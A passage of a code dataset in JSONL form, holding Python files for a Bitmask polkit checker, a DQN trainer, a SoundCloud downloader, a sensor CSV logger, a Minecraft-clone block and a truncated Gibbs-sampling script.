_system + \"PolicyChecker\"\n policy_checker = globals().get(platform_checker, None)\n if not policy_checker:\n # it is true that we miss permission to escalate\n # privileges without asking for password each time.\n logger.debug(\"we could not find a policy checker implementation \"\n \"for %s\" % (_system,))\n return True\n return policy_checker().is_missing_policy_permissions()\n\n\nclass PolicyChecker:\n \"\"\"\n Abstract PolicyChecker class\n \"\"\"\n\n __metaclass__ = ABCMeta\n\n @abstractmethod\n def is_missing_policy_permissions(self):\n \"\"\"\n Returns True if we could not find any policy mechanisms that\n are defined to be in used for this particular platform.\n\n :rtype: bool\n \"\"\"\n return True\n\n\nclass LinuxPolicyChecker(PolicyChecker):\n \"\"\"\n PolicyChecker for Linux\n \"\"\"\n LINUX_POLKIT_FILE = (\"/usr/share/polkit-1/actions/\"\n \"se.leap.bitmask.policy\")\n LINUX_POLKIT_FILE_BUNDLE = (\"/usr/share/polkit-1/actions/\"\n \"se.leap.bitmask.bundle.policy\")\n PKEXEC_BIN = 'pkexec'\n\n @classmethod\n def get_polkit_path(self):\n \"\"\"\n Returns the polkit file path.\n\n :rtype: str\n \"\"\"\n return (self.LINUX_POLKIT_FILE_BUNDLE if flags.STANDALONE\n else self.LINUX_POLKIT_FILE)\n\n def is_missing_policy_permissions(self):\n # FIXME this name is quite confusing, it does not have anything to do\n # with file permissions.\n \"\"\"\n Returns True if we could not find the appropriate policykit file\n in place\n\n :rtype: bool\n \"\"\"\n path = self.get_polkit_path()\n return not os.path.isfile(path)\n\n @classmethod\n def maybe_pkexec(self):\n \"\"\"\n Checks whether pkexec is available in the system, and\n returns the path if found.\n\n Might raise:\n NoPkexecAvailable,\n NoPolkitAuthAgentAvailable.\n\n :returns: a list of the paths where pkexec is to be found\n :rtype: list\n \"\"\"\n if self._is_pkexec_in_system():\n if not self.is_up():\n self.launch()\n time.sleep(2)\n if self.is_up():\n pkexec_possibilities = which(self.PKEXEC_BIN)\n leap_assert(len(pkexec_possibilities) > 0,\n \"We couldn't find pkexec\")\n return pkexec_possibilities\n else:\n logger.warning(\"No polkit auth agent found. 
pkexec \" +\n \"will use its own auth agent.\")\n raise NoPolkitAuthAgentAvailable()\n else:\n logger.warning(\"System has no pkexec\")\n raise NoPkexecAvailable()\n\n @classmethod\n def launch(self):\n \"\"\"\n Tries to launch policykit\n \"\"\"\n env = None\n if flags.STANDALONE:\n # This allows us to send to subprocess the environment configs that\n # works for the standalone bundle (like the PYTHONPATH)\n env = dict(os.environ)\n # The LD_LIBRARY_PATH is set on the launcher but not forwarded to\n # subprocess unless we do so explicitly.\n env[\"LD_LIBRARY_PATH\"] = os.path.abspath(\"./lib/\")\n try:\n # We need to quote the command because subprocess call\n # will do \"sh -c 'foo'\", so if we do not quoute it we'll end\n # up with a invocation to the python interpreter. And that\n # is bad.\n logger.debug(\"Trying to launch polkit agent\")\n subprocess.call([\"python -m leap.bitmask.util.polkit_agent\"],\n shell=True, env=env)\n except Exception as exc:\n logger.exception(exc)\n\n @classmethod\n def is_up(self):\n \"\"\"\n Checks if a polkit daemon is running.\n\n :return: True if it's running, False if it's not.\n :rtype: boolean\n \"\"\"\n # Note that gnome-shell does not uses a separate process for the\n # polkit-agent, it uses a polkit-agent within its own process so we\n # can't ps-grep a polkit process, we can ps-grep gnome-shell itself.\n\n # the [x] thing is to avoid grep match itself\n polkit_options = [\n 'ps aux | grep \"polkit-[g]nome-authentication-agent-1\"',\n 'ps aux | grep \"polkit-[k]de-authentication-agent-1\"',\n 'ps aux | grep \"polkit-[m]ate-authentication-agent-1\"',\n 'ps aux | grep \"[l]xpolkit\"',\n 'ps aux | grep \"[l]xsession\"',\n 'ps aux | grep \"[g]nome-shell\"',\n 'ps aux | grep \"[f]ingerprint-polkit-agent\"',\n 'ps aux | grep \"[x]fce-polkit\"',\n ]\n is_running = [commands.getoutput(cmd) for cmd in polkit_options]\n\n return any(is_running)\n\n @classmethod\n def _is_pkexec_in_system(self):\n \"\"\"\n Checks the existence of the pkexec binary in system.\n \"\"\"\n pkexec_path = which('pkexec')\n if len(pkexec_path) == 0:\n return False\n return True\n","repo_name":"leapcode/bitmask_client","sub_path":"src/leap/bitmask/util/privilege_policies.py","file_name":"privilege_policies.py","file_ext":"py","file_size_in_byte":5833,"program_lang":"python","lang":"en","doc_type":"code","stars":160,"dataset":"github-code","pt":"40"} +{"seq_id":"1296675161","text":"from fileinput import filename\nfrom unicodedata import name\nimport gym\nfrom network import Agent\nimport numpy as np\nimport sys\nfrom utils import plot_learning_curve\n\nif __name__ == '__main__':\n env_name = \"LunarLander-v2\" if sys.argv[-1] == \"lunar\" else \"CartPole-v0\"\n\n print(\"Environment {}\".format(env_name))\n \n env = gym.make(env_name)\n agent = Agent(gamma=0.99, epsilon=1.0, batch_size=64, n_actions=env.action_space.n, eps_end=0.01, input_dims=[env.observation_space.shape[0]], lr=0.003, name=env_name)\n scores, eps_history = [],[]\n n_games = 500\n \n best_score = 0\n for i in range(n_games):\n score = 0\n done = False\n observation = env.reset()\n\n while not done:\n action = agent.choose_action(observation)\n observation_, reward, done, info = env.step(action)\n score += reward\n agent.store_transition(observation, action, reward, observation_, done)\n\n agent.learn()\n observation = observation_\n \n scores.append(score)\n eps_history.append(agent.epsilon)\n\n avg_score = np.mean(scores[-100:])\n if avg_score > best_score:\n # print(\"saved checkpoint\", avg_score, best_score)\n 
agent.save_model()\n            best_score = avg_score\n\n        print('episode', i, 'score %.2f' % score, 'average score %.2f' % avg_score, 'epsilon %.2f' % agent.epsilon )\n\n    x = [i+1 for i in range(n_games)]\n    filename = '{}.png'.format(env_name)\n    plot_learning_curve(x, scores, eps_history, filename)\n","repo_name":"aungmyatv8/AI","sub_path":"DQN/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"17414835046","text":"import os\r\nimport re\r\nimport sys\r\nimport json\r\nimport base64\r\nimport argparse\r\nimport platform\r\nimport traceback\r\nimport subprocess\r\n\r\nimport m3u8\r\nimport mutagen\r\nimport requests\r\nfrom tqdm import tqdm\r\nfrom mutagen import id3\r\nfrom mutagen.flac import Picture\r\nfrom mutagen.oggopus import OggOpus\r\nfrom mutagen.mp4 import MP4, MP4Cover\r\nfrom mutagen.id3 import ID3NoHeaderError\r\n\r\nfrom api import client\r\n\r\n\r\ndef err(msg):\r\n\tprint(msg)\r\n\ttraceback.print_exc()\r\n\r\ndef parse_cfg():\r\n\twith open('config.json', encoding='UTF-8') as f:\r\n\t\treturn json.load(f)\r\n\r\ndef parse_cookies():\r\n\tparsed = {}\r\n\twith open('cookies.txt', encoding='UTF-8') as f:\r\n\t\tlines = f.readlines()\r\n\tfor line in lines:\r\n\t\tif line.startswith('#'):\r\n\t\t\tcontinue\r\n\t\tsplit_line = line.split('\\t')\r\n\t\tparsed[split_line[-2]] = split_line[-1].rstrip('\\n').replace('&amp;', '&').replace('&quot;', '\"')\r\n\treturn parsed\r\n\r\ndef dir_setup(path):\r\n\tif not os.path.isdir(path):\r\n\t\tos.makedirs(path)\r\n\r\ndef read_txt(path):\r\n\twith open(path) as f:\r\n\t\treturn [u.strip() for u in f.readlines() if u.strip()]\r\n\r\ndef process_urls(urls):\r\n\tprocessed = []\r\n\tfix = lambda x: x.split('#')[0]\r\n\tfor url in urls:\r\n\t\tif url.endswith('.txt'):\r\n\t\t\tfor txt_url in read_txt(url):\r\n\t\t\t\tif txt_url not in processed:\r\n\t\t\t\t\tprocessed.append(fix(txt_url))\r\n\t\telse:\r\n\t\t\tif url not in processed:\r\n\t\t\t\tprocessed.append(fix(url))\r\n\treturn processed\r\n\r\ndef parse_prefs():\r\n\tcfg = parse_cfg()\r\n\tparser = argparse.ArgumentParser()\r\n\tparser.add_argument(\r\n\t\t'-u', '--urls', \r\n\t\tnargs='+', required=True,\r\n\t\thelp='Multiple links or text file filenames / paths.'\r\n\t)\r\n\tparser.add_argument(\r\n\t\t'-q', '--quality',\r\n\t\tchoices=[1, 2, 3, 4], default=cfg['quality'], type=int,\r\n\t\thelp='1: 64 Kbps Opus, 2: 128 Kbps MP3, 3: 256 Kbps AAC, 4: best/download.'\r\n\t)\r\n\tparser.add_argument(\r\n\t\t'-o', '--output-path',\r\n\t\tdefault=cfg['output_path'],\r\n\t\thelp='Output path. 
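# Illustrative sketch (not from the source record): `np.mean(scores[-100:])`
# above is the usual 100-episode moving average; a deque with maxlen keeps
# the same statistic without slicing a growing list. A hedged alternative,
# not the script's own code.
from collections import deque
import numpy as np

class RunningScore:
    def __init__(self, window=100):
        self.scores = deque(maxlen=window)  # old entries drop automatically

    def add(self, score):
        self.scores.append(score)
        return float(np.mean(self.scores))

# usage: tracker = RunningScore(); avg_score = tracker.add(score)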
Double up backslashes or use single '\r\n\t\t\t 'forward slashes for Windows.'\r\n\t)\r\n\tparser.add_argument(\r\n\t\t'-t', '--template',\r\n\t\tdefault=cfg['fname_template'],\r\n\t\thelp='Naming template for track filenames.'\r\n\t)\r\n\tparser.add_argument(\r\n\t\t'-k', '--keep-cover', \r\n\t\taction='store_true', default=cfg['keep_cover'],\r\n\t\thelp='Keep cover in album folder.'\r\n\t)\r\n\targs = vars(parser.parse_args())\r\n\tcfg.update(args)\r\n\tcfg['urls'] = process_urls(cfg['urls'])\r\n\treturn cfg\r\n\r\ndef check_url(url):\r\n\tmedia_types = [\r\n\t\t(r'^https://soundcloud.com/[\\w-]+/sets/[\\w-]+$', 'set'),\r\n\t\t(r'^https://soundcloud.com/you/likes$', 'likes'),\r\n\t\t(r'^https://soundcloud.com/[\\w-]+/albums$', 'albums'),\r\n\t\t(r'^https://soundcloud.com/[\\w-]+/tracks$', 'tracks'),\r\n\t\t(r'^https://soundcloud.com/[\\w-]+/[\\w-]+$', 'track'),\r\n\t\t(r'^https://soundcloud.com/[\\w-]+/[\\w-]+\\?in=[\\w-]+/sets/[\\w-]+$', 'track')\r\n\t]\r\n\tfor media_type in media_types:\r\n\t\tif re.match(media_type[0], url) != None:\r\n\t\t\treturn media_type[1]\r\n\r\ndef sanitize(fname):\r\n\tif is_win:\r\n\t\treturn re.sub(r'[\\/:*?\"><|]', '_', fname)\r\n\telse:\r\n\t\treturn re.sub('/', '_', fname)\t\t\t\r\n\r\ndef parse_template(meta, unparsed, default):\r\n\ttry:\r\n\t\tparsed = unparsed.format(**meta)\r\n\texcept KeyError:\r\n\t\tprint('Failed to parse template. Default one will be used instead.')\r\n\t\tparsed = default.format(**meta)\r\n\treturn sanitize(parsed)\r\n\r\ndef parse_meta(src, meta=None, num=None, total=None, url=None):\r\n\tif meta != None:\r\n\t\tyear = src.get('release_date')\r\n\t\tif year != None:\r\n\t\t\tyear = year.split('-')[0]\r\n\t\tmeta['artist'] = src['user']['username']\r\n\t\tmeta['title'] =\t src.get('title')\r\n\t\tmeta['tracknumber'] = num\r\n\t\tmeta['trackpadded'] = str(num).zfill(len(str(meta['tracktotal'])))\r\n\t\tmeta['year'] = year\r\n\t\tif src.get('publisher_metadata') != None:\r\n\t\t\tmeta['isrc'] = src['publisher_metadata'].get('isrc')\r\n\t\t\tmeta['upc'] = src['publisher_metadata'].get('upc_or_ean')\r\n\t\t\tmeta['artist'] = src['publisher_metadata'].get('artist')\r\n\telse:\r\n\t\tmeta = {\r\n\t\t\t'album': src['title'],\r\n\t\t\t'albumartist': src['user']['username'], \r\n\t\t\t'comment': src['permalink_url'],\r\n\t\t\t'genre': src.get('genre'),\r\n\t\t\t'tracktotal': total\r\n\t\t}\r\n\t\tif src.get('publisher_metadata') != None:\r\n\t\t\tmeta['copyright'] = src.get('c_line')\r\n\treturn meta\r\n\r\n# mp3 always available?\r\ndef query_quals(meta):\r\n\tspecs = {\r\n\t\t'audio/ogg': ['64 Kbps OPUS', '.ogg'],\r\n\t\t'audio/mpeg': ['128 Kbps MP3', '.mp3'],\r\n\t\t'audio/mp4': ['256 Kbps AAC', '.m4a'],\r\n\t\t'download': []\r\n\t}\r\n\tfor transcode in meta['media']['transcodings']:\r\n\t\tif transcode['format']['protocol'] == 'hls':\r\n\t\t\tmime_key = transcode['format']['mime_type'].split(';')[0]\r\n\t\t\tspecs[mime_key].append(transcode['url'])\r\n\twant = cfg['quality']\r\n\tif want == 4:\r\n\t\tif meta['downloadable'] == True and meta['has_downloads_left'] == True:\r\n\t\t\tkey = 'download'\r\n\t\t\tspecs[key].extend(client.get_file(specs[key][0]))\t\t\t\r\n\t\telif len(specs['audio/mp4']) == 3:\r\n\t\t\tkey = 'audio/mp4'\r\n\t\telse:\r\n\t\t\tkey = 'audio/mpeg'\r\n\telif want == 3:\r\n\t\tif len(specs['audio/mp4']) == 3:\r\n\t\t\tkey = 'audio/mp4'\r\n\t\telse:\r\n\t\t\tkey = 'audio/mpeg'\r\n\telif want == 2:\r\n\t\tkey = 'audio/mpeg'\r\n\telif want == 1:\t\r\n\t\tif len(specs['audio/ogg']) == 3:\r\n\t\t\tkey = 
'audio/ogg'\r\n\t\telse:\r\n\t\t\traise Exception('Unavailable in OPUS.')\r\n\treturn specs[key]\r\n\r\ndef download_seg(url, path):\r\n\tsegments = []\r\n\tmanifest = client.get_manifest(url)\r\n\tparsed = m3u8.loads(manifest)\r\n\tif parsed.segment_map != None:\r\n\t\tsegments = [parsed.segment_map['uri']]\r\n\tsegments.extend(x.uri for x in parsed.segments)\r\n\tout_path = os.path.join('sc-dl_tmp', 'tmp.mp4')\r\n\twith tqdm(total=len(segments), \r\n\t\tbar_format='{l_bar}{bar}{n_fmt}/{total_fmt} segments [{elapsed}<{remaining}]') as bar:\r\n\t\t\t\t \r\n\t\twith open(out_path, 'wb') as f:\r\n\t\t\tfor url in segments:\r\n\t\t\t\tr = requests.get(url, headers={'Range': 'bytes=0-'}, stream=True)\r\n\t\t\t\tr.raise_for_status()\r\n\t\t\t\tfor chunk in r.iter_content(32*1024):\r\n\t\t\t\t\tif chunk:\r\n\t\t\t\t\t\tf.write(chunk)\r\n\t\t\t\tbar.update(1)\r\n\tsubprocess.run(['ffmpeg', '-loglevel', 'error', '-y', '-i', out_path, '-c:a', 'copy', path])\r\n\r\ndef download(url, path):\r\n\tout_path = os.path.join('sc-dl_tmp', 'tmp.mp4')\r\n\tr = requests.get(url, headers={'Range': 'bytes=0-'}, stream=True)\r\n\tr.raise_for_status()\r\n\twith tqdm(total=int(r.headers['Content-Length']), unit='B', unit_scale=True,\r\n\t\tunit_divisor=1024) as bar:\r\n\t\twith open(out_path, 'wb') as f:\r\n\t\t\tfor chunk in r.iter_content(32*1024):\r\n\t\t\t\tif chunk:\r\n\t\t\t\t\tf.write(chunk)\r\n\t\t\t\t\tbar.update(len(chunk))\r\n\r\ndef write_tags(meta, path, ext, cov_path):\r\n\tif cov_path != None:\r\n\t\twith open(cov_path, 'rb') as f:\r\n\t\t\tcov_data = f.read()\r\n\tif ext == '.m4a':\r\n\t\tt = [\r\n\t\t\t('\\xa9alb', 'album'),\r\n\t\t\t('aART', 'albumartist'),\r\n\t\t\t('\\xa9ART', 'artist'),\r\n\t\t\t('\\xa9cmt', 'comment'),\r\n\t\t\t('\\xa9gen', 'genre'),\r\n\t\t\t('\\xa9nam', 'title'),\r\n\t\t\t('\\xa9day', 'year')\r\n\t\t]\r\n\t\taudio = MP4(path)\r\n\t\taudio.delete()\r\n\t\tfor frame, key in t:\r\n\t\t\tif meta.get(key):\r\n\t\t\t\taudio[frame] = meta[key]\r\n\t\taudio['trkn'] = [(meta['tracknumber'], meta['tracktotal'])]\r\n\t\tif cov_path != None:\r\n\t\t\taudio['covr'] = [MP4Cover(cov_data, imageformat=MP4Cover.FORMAT_JPEG)]\r\n\tif ext == '.mp3':\r\n\t\ttry: \r\n\t\t\taudio = id3.ID3(path)\r\n\t\texcept ID3NoHeaderError:\r\n\t\t\taudio = id3.ID3()\r\n\t\taudio['TRCK'] = id3.TRCK(\r\n\t\t\tencoding=3, text=\"{}/{}\".format(meta['tracknumber'], meta['tracktotal'])\r\n\t\t)\r\n\t\tlegend={\r\n\t\t\t'album': id3.TALB,\r\n\t\t\t'albumartist': id3.TPE2,\r\n\t\t\t'artist': id3.TPE1,\r\n\t\t\t'comment': id3.COMM,\r\n\t\t\t'copyright': id3.TCOP,\r\n\t\t\t'isrc': id3.TSRC,\r\n\t\t\t'label': id3.TPUB,\r\n\t\t\t'title': id3.TIT2,\r\n\t\t\t'year': id3.TYER\r\n\t\t}\r\n\t\tfor k, v in meta.items():\r\n\t\t\tid3tag = legend.get(k)\r\n\t\t\tif v and id3tag:\r\n\t\t\t\taudio[id3tag.__name__] = id3tag(encoding=3, text=v)\r\n\t\tif cov_path != None:\r\n\t\t\taudio.add(id3.APIC(3, 'image/jpeg', 3, None, cov_data))\r\n\telif ext == '.ogg':\r\n\t\taudio = OggOpus(path)\r\n\t\tdel meta['trackpadded']\r\n\t\tfor k, v in meta.items():\r\n\t\t\tif v:\r\n\t\t\t\taudio.tags[k] = str(v)\r\n\t\tif cov_path != None:\r\n\t\t\tpicture = Picture()\r\n\t\t\tpicture.data = cov_data\r\n\t\t\tpicture.type = 17\r\n\t\t\tpicture.mime = u'image/jpeg'\r\n\t\t\tpicture.width = 500\r\n\t\t\tpicture.height = 500\r\n\t\t\tpicture.depth = 16\r\n\t\t\tpicture_data = picture.write()\r\n\t\t\tencoded_data = base64.b64encode(picture_data)\r\n\t\t\tvcomment_value = encoded_data.decode('ascii')\r\n\t\t\taudio['metadata_block_picture'] = 
[vcomment_value]\r\n\taudio.save(path)\r\n\r\ndef write_cover(path, url):\r\n\tcov_path = os.path.join(path, 'cover.jpg')\r\n\turl = url[:-9] + 't500x500.jpg'\r\n\tr = requests.get(url)\r\n\tr.raise_for_status()\r\n\twith open(cov_path, 'wb') as f:\r\n\t\tf.write(r.content)\r\n\treturn cov_path\r\n\r\ndef is_downloadable(track):\r\n\tif track['streamable'] == False:\r\n\t\tprint('Track is not streamable.')\r\n\t\treturn False\r\n\telif track['monetization_model'] == 'SUB_HIGH_TIER' and is_go_plus == False:\r\n\t\tprint('Track requires an active Go+ subscription.')\r\n\t\treturn False\r\n\telif track['policy'] == 'BLOCK':\r\n\t\tprint('Track unavailable in your region.')\r\n\t\treturn False\r\n\treturn True\r\n\r\ndef get_additional_meta(_url):\r\n\tsplit = _url.split('?in=')\r\n\turl = 'https://soundcloud.com/' + split[-1]\r\n\tmeta = client.get_metadata(url)['tracks']\r\n\ttotal = len(meta)\r\n\tfor num, _track in enumerate(meta, 1):\r\n\t\tif _track.get('permalink_url') == split[0]:\r\n\t\t\treturn num, total\t\r\n\r\ndef iter_track(meta, path, parsed_meta, num_oride=-1):\r\n\tcov_path = None\r\n\tout_path = os.path.join('sc-dl_tmp', 'tmp.mp4')\r\n\ttotal = len(meta)\r\n\tfor num, track in enumerate(meta, 1):\r\n\t\tif is_downloadable(track) == False:\r\n\t\t\tcontinue\r\n\t\tif num_oride != -1:\r\n\t\t\tparsed_meta = parse_meta(track, meta=parsed_meta, num=num_oride)\r\n\t\telse:\r\n\t\t\tparsed_meta = parse_meta(track, meta=parsed_meta, num=num)\r\n\t\tspecs = query_quals(track)\r\n\t\tis_dload = specs[2].startswith('https://c')\r\n\t\tif num == 1 and is_dload == False:\r\n\t\t\ttry:\r\n\t\t\t\tcov_path = write_cover(path, meta[0]['artwork_url'])\r\n\t\t\texcept Exception:\r\n\t\t\t\tprint('Failed to write cover.')\r\n\t\ttemplate = parse_template(parsed_meta, cfg['template'], '{trackpadded}. 
{title}')\r\n\t\tffmpeg_out_path = os.path.join(path, str(num)) + specs[1]\r\n\t\tpost_path = os.path.join(path, template) + specs[1]\r\n\t\tif os.path.isfile(post_path):\r\n\t\t\tprint('Track already exists locally.')\r\n\t\t\tcontinue\t\r\n\t\tif is_dload == True:\r\n\t\t\tprint('Downloading track {} of {}: {} - {} (download button)'.format(num, total, parsed_meta['title'], specs[0]))\r\n\t\t\tdownload(specs[2], ffmpeg_out_path)\r\n\t\telse:\r\n\t\t\tprint('Downloading track {} of {}: {} - {}'.format(num, total, parsed_meta['title'], specs[0]))\r\n\t\t\tdownload_seg(specs[2], ffmpeg_out_path)\r\n\t\t\twrite_tags(parsed_meta, ffmpeg_out_path, specs[1], cov_path)\r\n\t\ttry:\r\n\t\t\tos.rename(ffmpeg_out_path, post_path)\r\n\t\texcept Exception:\r\n\t\t\tprint('Failed to rename track.')\r\n\tif cov_path != None and cfg['keep_cover'] == False:\r\n\t\tos.remove(cov_path)\r\n\r\ndef set(meta, _, path=None):\r\n\tparsed_meta = parse_meta(meta, total=len(meta['tracks']))\r\n\ttemplate = parse_template(parsed_meta, \r\n\t\tcfg['media_types']['set']['folder_template'], '{albumartist} - {album}')\r\n\talbum_folder = \"{} - {}\".format(parsed_meta['albumartist'], parsed_meta['album'])\r\n\tif path != None:\r\n\t\talbum_path = os.path.join(path, template)\r\n\telse:\r\n\t\talbum_path = os.path.join(cfg['output_path'], template)\r\n\tdir_setup(album_path)\r\n\tprint(album_folder)\r\n\titer_track(meta['tracks'], album_path, parsed_meta)\r\n\r\ndef track(meta, url, path=None, num=1, total=1):\r\n\tif '?in=' in url:\r\n\t\tnum, total = get_additional_meta(url)\r\n\tparsed_meta = parse_meta(meta, total=total)\r\n\ttemplate = parse_template(parsed_meta, \r\n\t\tcfg['media_types']['track']['folder_template'], '{albumartist} - {album}')\r\n\ttrack_folder = \"{} - {}\".format(parsed_meta['albumartist'], meta['title'])\r\n\tif path != None:\r\n\t\ttrack_path = os.path.join(path, template)\r\n\telse:\r\n\t\ttrack_path = os.path.join(cfg['output_path'], template)\r\n\tprint(track_folder)\r\n\tdir_setup(track_path)\r\n\titer_track([meta], track_path, parsed_meta, num_oride=num)\r\n\r\ndef albums(artist_meta, _):\r\n\ttotal = 0\r\n\ttemplate = parse_template(artist_meta, \r\n\t\tcfg['media_types']['artist_albums']['folder_template'], '{username}')\t\r\n\tartist_path = os.path.join(cfg['output_path'], template)\r\n\tprint(artist_meta['username'] + '\\'s albums')\r\n\tdir_setup(artist_path)\r\n\talbums = client.get_artist_albums(str(artist_meta['id']))\r\n\tfor _album in albums:\r\n\t\ttotal += len(_album)\r\n\tif total == 0:\r\n\t\traise Exception('Artist does not have any albums.')\r\n\tfor _album in albums:\r\n\t\tfor num, album in enumerate(_album, 1):\r\n\t\t\tprint('\\nAlbum {} of {}:'.format(num, total))\r\n\t\t\tset(album[0], path=artist_path)\r\n\r\ndef likes(likes, _):\r\n\ttotal = 0\r\n\tfolder_name = cfg['media_types']['user_likes']['folder_name']\r\n\tlikes_path = os.path.join(\r\n\t\tcfg['output_path'], folder_name)\r\n\tprint('Likes')\r\n\tdir_setup(likes_path)\r\n\tfor like in likes:\r\n\t\ttotal += len(like)\r\n\tif total == 0:\r\n\t\traise Exception('You do not have any likes.')\r\n\tfor like in likes:\r\n\t\tfor num, _track in enumerate(like, 1):\r\n\t\t\tprint('\\nTrack {} of {}:'.format(num, total))\r\n\t\t\ttrack(_track['track'], _, path=likes_path, total=total)\r\n\r\ndef tracks(artist_meta, _):\r\n\ttotal = 0\r\n\ttemplate = parse_template(artist_meta, \r\n\t\tcfg['media_types']['artist_albums']['folder_template'], '{username}')\t\r\n\ttracks_path = os.path.join(cfg['output_path'], 
template)\r\n\tprint(artist_meta['username'] + '\\'s tracks')\r\n\tdir_setup(tracks_path)\r\n\t_tracks = client.get_artist_tracks(str(artist_meta['id']))\r\n\tfor _track in _tracks:\r\n\t\ttotal += len(_track)\r\n\tif total == 0:\r\n\t\traise Exception('Artist does not have any tracks.')\r\n\tfor _track in _tracks:\r\n\t\tfor num, _track in enumerate(_track, 1):\r\n\t\t\tprint('\\nTrack {} of {}:'.format(num, total))\r\n\t\t\ttrack(_track, _, path=tracks_path, num=num, total=total)\r\n\r\ndef main(url, media_type):\r\n\tif media_type in ('albums', 'tracks'):\r\n\t\tmeta = client.get_artist_info(url)\r\n\telif media_type == 'likes':\r\n\t\tmeta = client.get_user_likes()\t\r\n\telse:\r\n\t\tmeta = client.get_metadata(url)\r\n\tglobals()[media_type](meta, url)\r\n\r\ndef cleanup():\r\n\tfor fname in os.listdir('sc-dl_tmp'):\r\n\t\tos.remove(os.path.join('sc-dl_tmp', fname))\r\n\r\nif __name__ == '__main__':\r\n\tis_win = platform.system() == 'Windows'\r\n\ttry:\r\n\t\tif hasattr(sys, 'frozen'):\r\n\t\t\tos.chdir(os.path.dirname(sys.executable))\r\n\t\telse:\r\n\t\t\tos.chdir(os.path.dirname(__file__))\r\n\texcept OSError:\r\n\t\tpass\r\n\tprint('''\r\n _____ _____ ____ __ \r\n| __| |___| \\| | \r\n|__ | --|___| | | |__ \r\n|_____|_____| |____/|_____|\r\n\t''')\r\n\tcfg = parse_prefs()\r\n\tdir_setup('sc-dl_tmp')\r\n\tparsed = parse_cookies()\r\n\tclient = client.Client(parsed)\r\n\tplan = client.get_plan()\r\n\tis_go_plus = plan == 'Go+'\r\n\tprint('Signed in successfully - {} account.'.format(plan))\r\n\ttotal = len(cfg['urls'])\r\n\tfor num, url in enumerate(cfg['urls'], 1):\r\n\t\tprint('\\nItem {} of {}:'.format(num, total))\r\n\t\tmedia_type = check_url(url)\r\n\t\tif media_type == None:\r\n\t\t\tprint('Invalid URL:', url)\r\n\t\t\tcontinue\r\n\t\ttry:\r\n\t\t\tmain(url, media_type)\r\n\t\texcept KeyboardInterrupt:\r\n\t\t\tsys.exit()\r\n\t\texcept Exception:\r\n\t\t\terr('Item failed.')\r\n\t\tfinally:\r\n\t\t\tcleanup()","repo_name":"Sorrow446/SC-DL","sub_path":"sc-dl.py","file_name":"sc-dl.py","file_ext":"py","file_size_in_byte":14776,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"9554396718","text":"#!/usr/bin/env python3\n\nfrom time import sleep\nfrom datetime import datetime\nimport os\nfrom bme280 import BME280\nfrom ccs811 import CCS811\n\nCSV_FILENAME = './dump_data.csv'\n\nccs811 = CCS811()\nbme280 = BME280()\np, t, h = bme280.get()\nccs811.compensate(h, t)\n\nif not os.path.exists(CSV_FILENAME):\n # write header\n with open(CSV_FILENAME, 'w') as f:\n f.write('Date, CO2 ppm, Celsius, Humidity %, Pressure hPa\\n')\n\nwith open(CSV_FILENAME, 'a') as f:\n while(True):\n try:\n p, t, h = bme280.get()\n voc, co2 = ccs811.get()\n ccs811.compensate(h, t)\n if co2 == 0:\n continue\n now = datetime.now()\n # print(f\"{now.isoformat()}, {p:7.2f} hPa, {t:6.2f} C, {h:5.2f} %, eCO2:{co2:4d} ppm\")\n f.write(f\"{now}, {co2}, {t}, {h}, {p}\\n\")\n f.flush()\n sleep(60*10)\n except OSError:\n # i2c bus somtimes cannot access\n continue\n except KeyboardInterrupt:\n break\n","repo_name":"nv-h/i2c_env_sensors","sub_path":"save_csv.py","file_name":"save_csv.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"24071737701","text":"from .Block import *\n\nFACES = [\n (0, 1, 0),\n (0, -1, 0),\n (-1, 0, 0),\n (1, 0, 0),\n (0, 0, 1),\n (0, 0, -1),\n]\n\n\nclass redstone_lamp_off(Block):\n def getName(self):\n return 
\"minecraft:redstone_lamp\"\n\n def getTex(self):\n return tex_coords((14, 9), (14, 9), (14, 9))\n\n def update(self, model, world):\n (x, y, z) = self.pos\n for (dx, dy, dz) in FACES:\n npos = (x + dx, y + dy, z + dz)\n if npos in model.world:\n if model.world[npos].redstone_level:\n model.add_block(self.pos, \"extra:redstone_lamp_on_private_instance\")\n # print(\"[DEBUG] redstone lamp state change to high\")\n\n def redstoneStateUpdate(self, model, world):\n self.update(model, world)\n\n destroygroups = [destroyGroups.PIKAXE]\n\n\nhandler.register(redstone_lamp_off)\n","repo_name":"uuk0/mcpython-a-minecraft-clone-in-python","sub_path":"mods/mcpython/Blocks/redstone_lamp_off.py","file_name":"redstone_lamp_off.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"3992463889","text":"#optimised algorithm\ndef callOptimised(alpha,beta,gamma,iter_num,burnin,thin,actual):\n mCount,nCount,track1,newalpha,result1=gibbs_sampling(alpha,beta,gamma,iter_num,burnin,thin,False,actual)\n mCred,nCred=find_credibility(mCount, nCount)\n nCount,mCount,track2,_,result2=gibbs_sampling(newalpha,beta,gamma,30,burnin,thin,True,actual,mCred,nCred)\n return result2,actual\n\n#credibility score function\ndef find_credibility(mCount,nCount):\n mCred={}\n nCred={}\n for username,value1,value2 in mCount:\n den=mCount[(username,1,1)]+mCount[(username,0,0)]+mCount[(username,1,0)]+mCount[(username,0,1)]\n if(den==0):\n mCred[username]=0\n continue\n cred=(mCount[(username,1,1)]+mCount[(username,0,0)])/den\n mCred[username]=cred\n \n for username,value1,value2,value3 in nCount:\n den=nCount[(username,0,1,0)]+nCount[(username,0,1,1)]+nCount[(username,1,0,0)]+nCount[(username,1,0,0)]+nCount[(username,1,1,0)]+nCount[(username,1,1,1)]+nCount[(username,0,0,0)]+nCount[(username,0,0,1)]\n if(den==0):\n nCred[username]=0\n continue\n cred=(nCount[(username,0,0,0)]+nCount[(username,1,1,1)])/den\n nCred[username]=cred\n return mCred,nCred\n\n#function to get new hyper parameters\ndef getNewHyper(mCount):\n truepositive=0\n truenegative=0\n falsepositive=0\n falsenegative=0\n \n for (username,val1,val2),key in mCount.items():\n if(val1==1 and val2==1):\n truepositive+=key\n elif (val1==1 and val2==0):\n falsenegative+=key\n elif (val1==0 and val2==0):\n truenegative+=key\n else:\n falsepositive+=key\n truerate=(truepositive+truenegative)/2\n 